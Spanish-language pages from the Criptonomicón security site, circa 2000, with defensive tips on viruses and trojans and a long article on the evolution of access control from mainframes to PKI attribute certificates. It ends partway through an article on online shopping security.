Microsoft en World Wide Web.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/microsoft.html (1 of 2) [25/10/2000 02:30:50 p.m.]

Comprobar que los documentos no contienen macros con virus


Consejos prcticos

Esta informacin ha sido tomada de la ayuda de Word 97.

Participa con tus consejos y trucos


Referencias

Libro de Visitas

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/microsoft.html (2 of 2) [25/10/2000 02:30:50 p.m.]

Navidades sin disgustos

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Navidades sin disgustos


En estas fechas navideas, el volumen de correo, tanto postal como electrnico, se
multiplica considerablemente, debido al nmero colosal de tarjetas de felicitaciones
enviadas. En el mbito de Internet y del correo electrnico, crece en la misma medida
el nmero de incidentes de seguridad y de virus transmitidos por este medio, en la
forma de postales ejecutables. Normalmente sucede que o bien son ellas mismas un
virus o bien han sido infectadas por el camino, ya que si la postal cae simptica,
sern miles de usuarios los que se la retransmitan de unos a otros. Por otro lado, no
slo se corre el riesgo de contagiarse con algn virus, sino tambin de abrir
inadvertidamente agujeros de seguridad en la red corporativa de la empresa para la
que se trabaja, ya que junto con los correos de felicitacin pueden aparecer
simpticas imgenes animadas de los Reyes Magos en Java o ActiveX, mientras en el
trasfondo un ejecutable silencioso instala NetBus o BackOrifice, por citar algunos
ejemplos. O, simplemente, el correo contiene cdigo en JavaScript que explota los
ltimos y muy serios agujeros de seguridad descubiertos recientemente en los
navegadores.
En este panorama que puede parecer intimidatorio, resulta muy fcil evitar sorpresas,
basta con seguir unos sencillos consejos de sentido comn:
- No enves a los dems tarjetas de felicitacin ejecutables si no ests seguro de su
fuente (de quin los cre), especialmente si contienen ficheros ejecutables o cdigo
escrito en Java, JavaScript o ActiveX (algo frecuente si recibes o envas el correo en
formato HTML).
- Aunque te fes de la fuente, no enves ficheros muy grandes. Mucha gente se
conecta a Internet en estas fechas para hacer sus compras en lnea o simplemente
para felicitarse. Internet ya est suficientemente colapsada, sin necesidad de
sobrecargarla an ms con postales animadas de tamao gigantesco.
- Si recibes felicitaciones con ejecutables como ficheros adjuntos, no los abras si
proceden de remitentes desconocidos. Incluso aunque conozcas a quien te la envi,
suele ser ms prudente no abrirlos, ya que puede habrtela transmitido sin ser
consciente de su contenido. En cualquier caso, utiliza siempre un escaneador de virus
antes de ejecutarlos. Otro problema diferente lo constituye el contenido con controles
ActiveX o applets de Java, que podra realizar una gran variedad de fechoras en tu
sistema, desde tomar el control de tu ordenador hasta simplemente dejarlo colgado,
hacindote perder el trabajo no guardado en disco. Razn de ms para no abrir

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/navidades.html (1 of 2) [25/10/2000 02:30:50 p.m.]

Navidades sin disgustos


Consejos prcticos

ningn correo del que no ests completamente seguro.

Referencias

Por ltimo, plantate la siguiente pregunta: Realmente te merece la pena enviar una
postal con cdigo ejecutable? No puedes felicitar las fiestas con un texto?

Libro de Visitas

Feliz Navidad!
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/navidades.html (2 of 2) [25/10/2000 02:30:50 p.m.]

Los virus en disquetes

Consejos para
administradores
Consejos para
usuarios

Los virus en disquetes


Ya nadie se contagia con los disquetes. Quin arranca hoy da desde un disquete?
Te suena familiar esta frase? Pues aunque usemos flamantes estaciones de trabajo, a
menudo arrancamos desde la disquetera sin darnos cuenta. Quin no se ha dejado
olvidado un disquete dentro de la disquetera y cuando arranca el ordenador al da
siguiente se encuentra con el mensaje de Disco de arranque no vlido? Aj, ya lo
has hecho, y basta que ese disquete contuviera algn virus en el sector de arranque
para que te hubieras infectado.
Los disquetes con virus pueden ser algo del pasado. O no tanto. Por si acaso, la
prxima vez que enciendas el ordenador asegrate de que la disquetera est vaca.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/disquetes.html [25/10/2000 02:30:50 p.m.]

No creas todo lo que oyes ni instales todo lo que descargues

Consejos para
administradores
Consejos para
usuarios

No creas todo lo que oyes ni instales


todo lo que descargues
Internet es un medio que se presta fcilmente a la rpida circulacin de bulos y
mentiras, especialmente en lo que a virus se refiere. Por este motivo no hay que creer
todo lo que nos dicen ("No abras tal correo porque te borrar el disco duro...") ni se
puede andar ejecutando programas felizmente. Adems de los virus convencionales,
existen ataques ms sofisticados, como los caballos de Troya que explotan nuestra
conexin a Internet para filtrar informacin sobre nuestro sistema. En sta, como en
otras cuestiones, se hace necesario mantenerse en un punto medio conservador,
examinando todo el software antes de ejecutarlo, especialmente si lo recibimos por
correo electrnico o lo descargamos desde sitios Web de dudosa fiabilidad.
El CERT acaba de publicar una lista de consejos sobre los Troyanos de Internet que
conviene leer. Se puede encontrar en la pgina del CERT.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/cert.html [25/10/2000 02:30:50 p.m.]

Hablan los expertos - ndice temtico

Comercio electrnico

Criptologa y seguridad

ndice temtico

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados en el Boletn


del Criptonomicn en la seccin Hablan los expertos. Estn agrupados en
temas:

Intimidad y privacidad

Virus

Las tecnologas Web ms utilizadas, SSL y


Comercio electrnico SET, los riesgos y fraudes ms comunes, las
direcciones futuras, los retos actuales.
Desde los aspectos ms puramente matemticos
de la criptologa hasta las ltimas
Criptologa y seguridad
implementaciones y desarrollos en seguridad en
redes.
Aspectos jurdicos de temas que a menudo
Cuestiones legales y jurdicas
tienen repercusiones legales.
Los ltimos peligros y amenazas a nuestra
intimidad, las maneras de conservar la
Intimidad y privacidad
privacidad en la Red, la nueva tica de la
Sociedad de la Informacin.
Cmo protegerse de los ataques de los virus y
Virus
troyanos.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/tematico.html [25/10/2000 02:30:51 p.m.]

Hablan los expertos - ndice por orden de aparicin

Comercio electrnico

Criptologa y seguridad

ndice por orden de aparicin

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados en el Boletn del
Criptonomicn en la seccin Hablan los expertos. Estn agrupados por orden de
aparicin en el boletn, siendo los ms recientes los que se listan a la cabeza:
Control de accesos

Intimidad y privacidad

Virus

Virus: verdades y mentiras

Luces y sombras en las compras por Internet

Marcas de agua

Mitos sobre ICMP

El lado oscuro de SET

Proteccin integral de la informacin de la empresa

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la


empresa espaola?

A la caza del troyano

Las claves criptogrficas

Por qu no me gusta ENFOPOL

Seguridad de las tarjetas de crdito en Internet

El azar en la criptografa

Qu son los certificados digitales

Falsas expectativas del comercio electrnico

Seguridad en Tarjetas con Microprocesador

Votaciones a travs de Internet

Criptografa de clave pblica

Los secretos del comercio electrnico en Espaa

Conocimiento Nulo

Claves para la venta de productos o servicios a travs de Internet

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/orden.html (1 of 2) [25/10/2000 02:30:51 p.m.]

Hablan los expertos - ndice por orden de aparicin

Recelos y sospechas en el mundo PGP

Cortafuegos

Proteccin del copyright electrnico: Fingerprinting

Canales subliminales en sistemas de clave pblica

Cmo funcionan las firmas digitales

Seguridad en los nuevos medios de pago

La amenaza de los ltimos caballos de Troya

Criptografa visual

Esquemas umbrales

Presente y futuro del comercio electrnico

Comparativa de antivirus

Situacin legal de la criptologa en Espaa

Es legal el uso de cookies?

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/orden.html (2 of 2) [25/10/2000 02:30:51 p.m.]

Control de accesos

Comercio electrnico

Criptologa y seguridad

Control de accesos: De la era mainframe a las PKI

Cuestiones legales

Por Luis Rodrguez Berzosa

Intimidad y privacidad

Desde los orgenes del tiempo (informtico) se ha tratado de controlar el

Virus

acceso a los recursos de informacin. La tecnologa utilizada para este


control de accesos ha evolucionado con los propios sistemas de informacin
protegidos. En este artculo se pretende contemplar en una perspectiva
histrica el problema de la autorizacin, contemplando su pasado, su
presente y, de manera especial, su futuro, que indudablemente estar ligado
con las nuevas tecnologas de clave pblica, actualmente tan en boga en
este microcosmos de la seguridad.
El problema
La autenticacin pretende establecer quin eres. La autorizacin (o control
de accesos) establece qu puedes hacer con el sistema. Ambos conceptos
parecen ir ligados de forma indisoluble, pero no siempre. La posesin de la
llave de mi coche le parece autoridad suficiente para dejarse conducir,
incluso por un individuo cuyo pasaporte poco tiene que ver con el mo. Estos
dos conceptos, que a menudo se mezclan de manera difusa, son
completamente independientes. Sin embargo, especialmente cuando se
accede a un recurso de informacin va red, sin proteccin fsica, existen tres
actividades que irn siempre ligadas: La autenticacin (quin soy), la
autorizacin (qu puedo hacer) y el registro de auditora (qu he hecho).
En un mundo cada vez ms dependiente de las redes, es vital no slo
proteger el acceso a los recursos por los 'malos', sino tambin evitar una
manipulacin accidental con fatales consecuencias. Un ejemplo en boga: la
proteccin de los ficheros de datos personales, objeto del reciente
Reglamento de la LORTAD.
La solucin conceptual
Existen tradicionalmente dos tipos bsicos de controles de acceso con
filosofas diametralmente opuestas:
* En el modelo de control de acceso discrecional (DAC), un usuario bien

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (1 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

identificado (tpicamente, el creador o 'propietario' del recurso) decide cmo


protegerlo estableciendo cmo compartirlo, mediante controles de acceso
impuestos por el sistema. Este es el modelo habitual en buena parte de los
sistemas operativos ms habituales. Lo esencial es que el propietario del
recurso puede cederlo a un tercero.
En sus inicios estos sistemas eran excesivamente simples, al permitir un
conjunto limitado de operaciones posibles sobre un recurso (rwx por
propietario, grupo o resto de usuarios, como en Unix), si bien pronto se
aadieron las famosas listas de control de accesos (ACLs), listas de
usuarios y grupos con sus permisos especficos. Las ACLs permiten un nivel
de granularidad que, en ocasiones, es inconveniente, por cuanto complica la
administracin de la seguridad.
* En el modelo de control de acceso mandatorio (MAC), es el sistema quin
protege los recursos. Todo recurso del sistema, y todo principal (usuario o
entidad del sistema que represente a un usuario) tiene una etiqueta de
seguridad. Esta etiqueta de seguridad sigue el modelo de clasificacin de la
informacin militar, en donde la confidencialidad de la informacin es lo ms
relevante, formando lo que se conoce como poltica de seguridad multinivel.
Una etiqueta de seguridad se compone de una clasificacin o nivel de
seguridad (nmero en un rango, o un conjunto de clasificaciones discretas,
desde DESCLASIFICADO hasta ALTO SECRETO) y una o ms categoras
o compartimentos de seguridad (CONTABILIDAD, VENTAS, I+D...). En este
tipo de sistemas, todas las decisiones de seguridad las impone el sistema,
comparando las etiquetas del accesor frente al recurso accedido, siguiendo
un modelo matemtico (Bell-LaPadula, 1973). Los criterios de seguridad
TCSEC correspondientes al nivel de seguridad B1 o superior incluyen este
modelo.
El modelo DAC se ha venido usando profusamente en sistemas operativos
de propsito general con clasificacin de seguridad TCSEC C1 o superior, y
en virtualmente todos los sistemas de bases de datos, aplicativos, y
sistemas de comunicaciones de propsito comercial. El modelo MAC no ha
salido habitualmente del entorno militar, donde la clasificacin de la
informacin es lo ms relevante.
Los modelos DAC y MAC son inadecuados para cubrir las necesidades de la
mayor parte de las organizaciones. El modelo DAC es demasiado dbil para
controlar el acceso a los recursos de informacin de forma efectiva, en tanto
que el MAC es demasiado rgido. Desde los 80 se ha propuesto el modelo
de control de accesos basado en roles (RBAC), como intento de unificar los
modelos clsicos DAC y MAC, consiguiendo un sistema donde el sistema
impone el control de accesos, pero sin las restricciones rgidas impuestas
por las etiquetas de seguridad.
Bsicamente, un rol establece un nivel de indireccin entre los usuarios y los
derechos de acceso, a travs de un par de relaciones: asignacin de roles a
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (2 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

usuarios, y asignacin de permisos y privilegios a roles. Las polticas de


control de accesos basado en roles regulan el acceso de los usuarios a la
informacin en trminos de sus actividades y funciones de trabajo,
representndose as de forma natural la estructura de las organizaciones.
Uno de los problemas ms acuciantes en la gestin de grandes sistemas de
informacin heterogneos es la complejidad de la administracin de
seguridad. La aproximacin RBAC, intuitivamente, modela de forma natural
la estructura de autorizacin en las organizaciones del mundo real,
facilitando las tareas administrativas al separar la asignacin de individuos a
funciones o perfiles de trabajo, y la definicin de polticas de acceso
(definicin de roles en trminos de lo que pueden hacer en el sistema).
Permiten asimismo la construccin jerrquica de estas polticas de acceso,
por herencia o especializacin. As, la poltica de control de accesos para un
supervisor de planta puede ser una especializacin de la del operador de
planta. Por ello, la tecnologa RBAC tiene el potencial de reducir la
complejidad y el coste de la administracin de seguridad en estos entornos
heterogneos.
Adems, dada la alta integracin entre los roles y las responsabilidades de
los usuarios, pueden seguirse los principios del mnimo privilegio y de la
separacin de responsabilidades. Estos principios son vitales para alcanzar
el objetivo de integridad, al requerir que a un usuario no se le otorguen
mayores privilegios que los necesarios para efectuar su trabajo, y que para
completar una transaccin de cierta seguridad (por ejemplo, la autorizacin
de un pago) se requiera la culminacin de una cadena de transacciones
simples por ms de un usuario.
El modelo RBAC es hoy da ubicuo: desde sistemas de base de datos
relacionales, pasando por sistemas operativos de red, cortafuegos,
productos de seguridad mainframe y entornos abiertos, sistemas de Sign-On
nico y de seguridad web...
La industria ha venido usando otros modelos de control de accesos, como
complemento de estos tres bsicos, como el modelo de capacidades, en
donde parte de las decisiones de autorizacin se toman a partir de
'capacidades', 'derechos efectivos' o atributos de privilegio, contenidos en las
credenciales que un usuario adquiere durante la autenticacin. DCE, por
ejemplo, incorpora este modelo en su servicio de seguridad. A menudo estos
atributos de autorizacin se integran en un objeto conocido como 'Certificado
de Atributos de Privilegio' (PAC, por sus siglas en ingls). Un PAC es como
una acreditacin de visitante: Se obtiene tras prueba de identidad, est
emitida por una autoridad en la que se confa, no identifica al individuo pero
s lo categoriza (e.g. 'Visitante'), es de duracin limitada, y no encierra en s
mismo informacin de privilegios o permisos (qu puertas puedo franquear,
por ejemplo).
La 'Edad de Piedra': Sistemas centralizados
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (3 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

rase una vez una poca en la que todo era mucho ms simple. El
mainframe era la pieza angular de los sistemas de informacin (algo que, en
muchos casos, sigue teniendo vigencia). Ya en 1976 IBM lanza RACF
(Resource Access Control Facility), sistema de seguridad que, pese a su
espartana simplicidad inicial, evolucion, revolucionando la concepcin
sobre los sistemas de control de accesos. Casi al tiempo, surgieron otros
productos de seguridad anlogos, como CA-ACF2, TopSecret, y un largo
etctera.
Unix se encontraba en sus balbucientes inicios. Su seguridad se basaba en
el modelo DAC simple, donde en esencia los recursos podan leerse,
escribirse y ejecutarse, y donde se concedan permisos para el propietario,
para el grupo y para el resto de usuarios del sistema.
La 'Edad de Bronce': Sistemas distribuidos
Y es cuando hace su aparicin la informtica distribuida. Se empieza a
hablar de cliente/servidor. Se introduce el concepto de middleware
transaccional. Las bases de datos relacionales implementan controles de
acceso a datos basados en perfiles de usuario o roles, con sistemas
bastante sofisticados. Aparece DCE como plataforma de informtica
distribuida, donde el servicio de seguridad se basa en una autenticacin
distribuida (Kerberos) y la emisin de certificados de atributos de privilegio
(tickets que encierran los atributos de autorizacin de un principal DCE).
DCE, pese a su elegante diseo en cuanto a seguridad, no cobra la difusin
que merece (debido a su fama de complejo). En informtica distribuida,
estamos en el punto de no retorno: Hay ya demasiados sistemas de
seguridad heterogneos como para pensar en integrarlos en una nica
infraestructura de seguridad, sea DCE o no.
Aparecen en la industria soluciones que prometen, adems de facilidades
como Sign-On nico o administracin centralizada de la seguridad, un primer
control de accesos a las aplicaciones corporativas. Estos sistemas, que se
interponen entre los usuarios y los sistemas de seguridad de los diferentes
componentes de una aplicacin distribuida, aportan ms a la facilidad de
administracin de seguridad y la conveniencia de los usuarios (lo cual no es
poco) que a la seguridad en s misma. Aparecen perfiles especficos del
estndar GSS-API, como SESAME, respuesta europea a DCE, que a
menudo conforman la infraestructura en la que se apoyan este tipo de
productos.
La gestin distribuida de permisos cobra relevancia. Los datos de control de
accesos (permisos, ACLs) se almacenan localmente, pero deben ser
gestionados de forma centralizada. Aparecen una nueva clase de
herramientas, directamente encaminadas no ya a proporcionar seguridad,
sino a facilitar la administracin de los mltiples sistemas de seguridad
existentes.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (4 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

Y la actual 'Edad de Hierro': Las PKI


Entonces surge la Internet, las arquitecturas de objetos y componentes
distribuidas (CORBA, EJB, DCOM). El lenguaje Java cobra un xito sin
precedentes por su promesa de lenguaje independiente de plataforma.
Todas estas plataformas ofrecen sistemas de seguridad que recogen la
experiencia previa. As, el servicio de seguridad CORBA se basa en un
paradigma que se parece sospechosamente al de DCE. El modelo de
seguridad Java, en cuanto a autorizacin, se basa en un modelo de
dominios protegidos, donde los permisos de asignan en el sistema local para
un dominio que agrupa las clases Java cargadas desde unos determinados
sitios y firmados por unos determinados individuos.
Pero lo ms visible y novedoso en el presente quiz sea el fenmeno PKI.
Ya no es posible controlar un grupo ms o menos numeroso de empleados:
en los negocios electrnicos se requiere controlar la seguridad en los
accesos de usuarios bajo los que no se tiene control administrativo, como
proveedores, clientes, consumidores... La PKI es, sobre todo, infraestructura,
que las aplicaciones tanto orientadas a Internet como orientadas al 'mundo
interior' (bases de datos, sistemas operativos) estn tan slo comenzando a
aprovechar.
Bien, ya tenemos una PKI... Y qu? Qu aporta de cara al control de
accesos? La tecnologa de clave pblica ofrece grandes ventajas en cuanto
a autenticacin fuerte de usuarios (su combinacin con dispositivos como las
tarjetas inteligentes, de hecho, constituye el estado del arte en cuanto a
autenticacin de usuarios). Protocolos como SSL o IPSEC se apoyan en la
PKI para ofrecer servicios aadidos de confidencialidad e integridad en las
comunicaciones. La cuestin es: tienen las PKI algo que ofrecer en cuanto
al control de accesos? El resto del artculo examinar esta cuestin.
Los certificados de atributos
Los certificados de atributos no son sino la respuesta de clave pblica a los
'certificados de atributos de privilegio' usados en el pasado. La idea es
simple: 'Demos al Csar lo que es del Csar'. Los certificados de clave
pblica X.509 proporcionan evidencia de la identidad de una persona
(aunque incluso esto puede ponerse en cuestin). Pero en entornos de
comercio electrnico, se precisa ms informacin que la mera identidad, en
especial cuando las partes involucradas en una transaccin no han tenido
contacto previo. En este caso, la informacin sobre los atributos de privilegio
de una persona (por ejemplo, su capacidad de firmar un contrato, o su lmite
de crdito) es mucho ms relevante que su mera identidad.
X.509 v3 intodujo el til concepto de extensin. Lo ms lgico pareci en ese
momento aadir al certificado de identidad extensiones que recogieran estos
atributos. Pero es como mezclar agua y aceite. Los atributos de privilegio
cambian mucho ms a menudo que la identidad de los individuos, lo cual

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (5 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

obliga a revocar el certificado antiguo y emitir uno nuevo. Y la validacin del


certificado, que ya era tema delicado por las revocaciones debidas, se
convierte en esta situacin en tema trascendental (evidentes cuando se
otorga un certificado al director de compras, y a continuacin se le despide).
Las extensiones dedicadas al control de accesos son propietarias, y
dificultan la interoperabilidad. Y, por si fuera poco, tenemos un problema de
jurisdiccin: el certificado de identidad podr ser emitido por una autoridad
de certificacin que d fe de la identidad del usuario (como
FNMT/MAP/Correos); pero, puede la FNMT erigirse como depositaria de la
concesin de privilegios de utilizacin de los recursos de informacin de mi
empresa X?
La respuesta a estas dificultades es inmediata: Por qu no dividir el
certificado X.509 en dos, uno para la informacin de identidad - -certificado
de identidad, y el otro para la informacin ligada con el control de accesos
-certificado de atributos? Esto simplifica el proceso de emisin y, si los
certificados de atributos se emiten con una duracin limitada, eliminar en
ciertas circunstancias el problema de revocacin. Si los certificados de
atributos duran un da, o una hora, podra no ser necesaria su revocacin:
simplemente expiran.
Cules pueden ser los atributos encerrados en un certificado de esta
clase? Roles, grupos, identidades de acceso y/o auditora (para aplicaciones
de sign-on nico), restricciones... Por ejemplo, un atributo puede expresar el
lmite de crdito concedido a un determinado suscriptor a un servicio de
tienda virtual. Las posibilidades son ilimitadas. Podemos contemplar as los
certificados de atributos como un 'manojo de llaves' que se aaden a un
certificado de identidad ('pasaporte digital') para abrir determinadas puertas.
Ejemplos de aplicaciones de esta tecnologa son:
* Servicios de suscripcin ('pago por visin'). Los usuarios se registraran de
forma gratuita, pero slo obtendran un certificado de atributos tras el pago
de una cuota de subscripcin. La duracin del certificado correspondera a la
de disfrute del servicio subscrito.
* Control de accesos basado en roles a servicios en red cuya autenticacin
se realiza usando una PKI (web, FTP, SMTP...). El protocolo SSL autentica
al cliente; un certificado de atributos permite al servicio determinar qu
puede hacer el usuario dentro del mismo.
* Control de accesos a redes privadas virtuales (RPV). Pinsese en los
usuarios 'itinerantes' de una gran organizacin. En vez de mantener
controles de acceso replicados en cada puerta de acceso RPV, mediante un
servicio centralizado se concede al usuario un certificado de atributos que le
franquee el acceso a travs del puerto de acceso.
* Sign-on nico basado en autenticacin fuerte mediante tarjeta inteligente.
Las credenciales necesarias para el acceso a aplicaciones (usuario /
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (6 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

password) pueden ir cifradas en el certificado de atributos concedido al


usuario tras el proceso de autenticacin basado en la posesin de la clave
privada en tarjeta inteligente.
Certificacin cruzada y traduccin de polticas
Otro medio de controlar el acceso a servicios de alto nivel mediante una PKI
lo tenemos en el concepto de 'polticas de utilizacin' y 'traduccin de
polticas'. A menudo la autoridad de certificacin emisora s puede hacer
establecer condiciones sobre la utilizacin de las claves y el certificado
emitido, a travs de las extensiones de poltica de uso. El banco X puede
emitir un certificado para un cliente, y establecer a nivel de certificado de
identidad el tipo de servicio al que el cliente tiene derecho ('tarjeta oro' y
'superlibretn', por ejemplo). Esto no es tan flexible como los certificados de
atributos, pero puede ser perfectamente aprovechable bajo ciertas
condiciones.
Imaginemos que el banco X firma un acuerdo de colaboracin (o se fusiona,
segn cierta moda imperante) con el banco Y, que tiene su propio servicio
de banca virtual y emite certificados para dos tipos de servicios,
denominados sin demasiada imaginacin 'tarjeta platino' y
'supersuperlibretn'. Ambos bancos emiten certificados cruzados que, algn
da, las aplicaciones de banca virtual de cada entidad aprovecharn para
otorgar su confianza a los poseedores de certificados emitidos por el otro
banco. El problema es: Equivale el usuario de una 'tarjeta oro' del banco X
a un usuario de la 'tarjeta platino' del banco Y?
Este tipo de relaciones entre polticas de uso de certificados pueden hacerse
explcitas en los certificados cruzados mediante las extensiones estndar de
traduccin de polticas (policy mapping). As, nuestros bancos podrn
equipar las respectivas tarjetas oro y platino, y no hacer lo propio con las
'superlibretn' y 'supersuperlibretn'. Aprovecharn algn da las
aplicaciones esta informacin?
Autorizacin en autoridades de validacin
Sin validacin (comprobacin de que un certificado est firmado por una
cadena de autoridades entre las que se haya una en la que se confa, que el
certificado est dentro de su perodo de validez, y que no haya sido
revocado), el receptor de un certificado digital en una transaccin de
comercio-e slo podr confiar parcialmente en la misma. En el mundo de las
tarjetas de crdito, cuando uno se halla enfrente del terminal punto de venta,
tiene lugar una validacin en lnea de la tarjeta, en la que la disponibilidad es
esencial (la emisin de la tarjeta, por contra, es una funcin fuera de lnea:
poco importa que la tarjeta me llegue un da antes o un da despus). Lo
mismo ocurre con los certificados digitales: su emisin suele ser un proceso
offline, mientras que su validacin es un proceso online.
Para entornos de produccin, o para aplicaciones de alta sensibilidad (no ya
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (7 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

el pago del alquiler de una pelcula en el videoclub de la esquina), una PKI


sin validacin es fundamentalmente incompleta e insegura. Para
proporcionar esta funcin surgen las Autoridades de Validacin, cuya
competencia es la validacin de los certificados, no su emisin; y aadir a la
validacin 'intrnseca' (firma correcta por una cadena de autoridades en la
que se confa, validez temporal, no revocacin/suspensin) una validacin
extrnseca: A partir de informacin de poltica de accesos se establece si un
certificado es vlido -si, adems de ser vlido intrnsecamente, verifica
adems las condiciones de la poltica de accesos impuestas por la
organizacin. Y si el certificado no es 'vlido', la aplicacin se niega a ofrecer
el servicio solicitado.
El imponer un punto de control de accesos en el proceso de validacin tiene
sustanciales ventajas: La validacin es un proceso independiente de la
emisin del certificado, de forma que los parmetros para la autorizacin
pueden modificarse 'a posteriori', tras la emisin del certificado: Cambios en
la poltica de accesos no requieren la revocacin del certificado.
Conclusin
Lejos quedan ya los tiempos en los que todo se reduca a asegurar el
mainframe corporativo. La evolucin de los sistemas de control de accesos
ha ido pareja con la de los sistemas de informacin. Vivimos en un mundo,
mal que nos pese, dirigido a los sistemas no ya distribuidos, sino
'desparramados', y se hacen necesarios los modelos de control de accesos
para estos nuevos sistemas. La tecnologa de clave pblica, como viene
siendo habitual, tiene mucho que decir al respecto.
Reproducido de "Revista SIC", n 37, con el permiso de su director.
Publicado en el Boletn del Criptonomicn #68 y #69.
Luis Rodrguez Berzosa es licenciado en fsicas y matemticas por la U. Complutense de
Madrid. Ha trabajado en compaas del sector como consultor de Seguridad, y en la
actualidad es director tcnico de Ideal Objects. Sus intereses estn en XML y WAP, la
seguridad en objetos distribuidos, y la tecnologa de clave pblica.

Informacin adicional

Control de acceso

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (8 of 9) [25/10/2000 02:30:52 p.m.]

Control de accesos

Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos69.html (9 of 9) [25/10/2000 02:30:52 p.m.]

Luces y sombras en las compras por Internet

Comercio electrnico

Criptologa y seguridad

Luces y sombras en las compras por Internet

Cuestiones legales

Por John Heppe

Intimidad y privacidad

Me gustara detallar el proceso de la compra por Internet, antes de proceder

Virus

a opinar sobre la seguridad a aplicar. Al hacer compras por Internet se


debera distinguir 3 fases:
1. Llenar el carrito de la compra.
2. Dar los datos de la entrega.
3. Dar los datos para el pago.
Slo conozco a 2 servidores que tratan el primer paso como confidencial;
personalmente creo que hay poca gente interesada en el hecho que se
manifiestan en esta fase, ms bien del tipo "existe gente en este mundo que
quiere comprar 24 latas de cerveza Mahou". Te puedo asegurar que existe
mucha gente as, miles de ciudadanos, aunque concentrados en la provincia
de Madrid. Por no estar relacionado con la persona que hace la compra, no
tiene mucha privacidad. No obstante, esta postura se debe matizar,
dependiendo del contenido del carrito. Si el carrito contiene un libro "Como
